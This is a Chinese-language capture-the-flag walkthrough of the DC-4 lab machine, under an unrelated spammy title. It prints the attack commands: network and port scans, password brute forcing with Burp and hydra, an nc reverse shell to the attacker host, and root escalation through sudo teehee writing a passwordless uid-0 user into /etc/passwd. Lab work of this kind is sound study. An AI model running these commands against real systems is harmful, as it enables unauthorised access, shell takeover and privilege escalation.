php做网站后台合肥网络推广培训学校

攻击机：kali

靶机：DC-4

一，信息收集

1.主机发现

找寻同网段下存活的主机

arp-scan -l

2.端口扫描

查看此主机上有哪些开放端口

nmap -sV -p- 192.168.126.136

发现22，80端口，远程连接跟网站（大概）

3,目录扫描

查看网站后台目录

 dirsearch -u http://192.168.126.136 

好像没有发现敏感信息

二，开始渗透

1.用户登录爆破

最开始尝试了几个弱口令没成功一气之下直接开始爆破

打开这个网页

看提示应该是管理员登录，用户名直接用admin

使用burp抓包

这里只用爆破密码

字典网上都不少直接下载top5000的字典

查看结果发现密码是happy

成功登录

试了一下这几个选项发现这个是一个命令执行页面

2.任意命令执行

还是使用burp抓包，发到repeater

可以看出来这个是通过radio的值进行命令执行

试一下其他命令看行不行，试了一下id，whoami，ip addr之类的都可以执行

猜测这个应该是没有加任何过滤的任意命令执行

3.反弹shell

因为找到了一个任意命令执行的点，所以开始nc反弹连接

先在kali端进行监听

nc -lvvp 6666

将burp抓的包中指令的部分改成这个后发送

nc 192.168.126.135 6666 -e /bin/bash 

成功连接

发现是www-data用户，权限很低

先升级shell，交互模式，避免意外退出又要重新连接

python -c 'import pty;pty.spawn("/bin/bash")'

4.提权

查看其他的用户看看有没有突破口

转到/home里，这个是Linux的普通用户的位置

发现有三个用户，尝试了一下，只有jim这个能打开

查看jim文件夹里边

打开test.sh，看翻译大概就是，要让你暴力去破解

密码文件应该就是那个old-passowrd.bak

这个应该是曾经用过的密码，真正的密码应该就在这里面，把这个东西复制到kali里面，然后使用hydra进行爆破

这个可能会有点慢，要等几分钟，可以看到jim用户登录密码是jibril04

然后换成jim用户

su jim

输入密码：jibril04登录

打开刚刚没有权限的mbox文件

意思是我有一个来自root用户的信，所以我们去/var/spool/mail邮箱里面找找去

发现是charles发来的信息，登录密码：^xHhA&hvim0y

切换到charles用户

发现还没有root的权限，用 sudo -l 看一下自己有什么权限

发现有一个teehee，上网搜了一下

teehee是个小众的linux编辑器。如果有sudo权限。可以利用其来提权

核心思路就是利用其在passwd文件中追加一条uid为0的用户条目

用户文件格式为

[注册名]:[口令]:[用户标识号]:[组标识号]:[用户名]:[用户主目录]:[命令解析程序]

echo "bluechips::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

按照linux用户机制，如果没有shadow条目，且passwd用户密码条目为空的时候，可以本地直接su空密码登录。所以只需要执行su raaj就可以登录到raaj用户，这个用户因为uid为0，所以也是root权限

所以添加一个用户,使用teehee执行写入到/etc/passwd中，加入到root权限组中

可以看到这样可以不需要密码登录，并且有root权限

5.找flag

去/root里找到flag.txt

结束~~

三，总结

teehee提权通过修改passwd文件，添加一个无密码root权限的用户

echo "bluechips::0:0:::/bin/bash" | sudo teehee -a /etc/passwd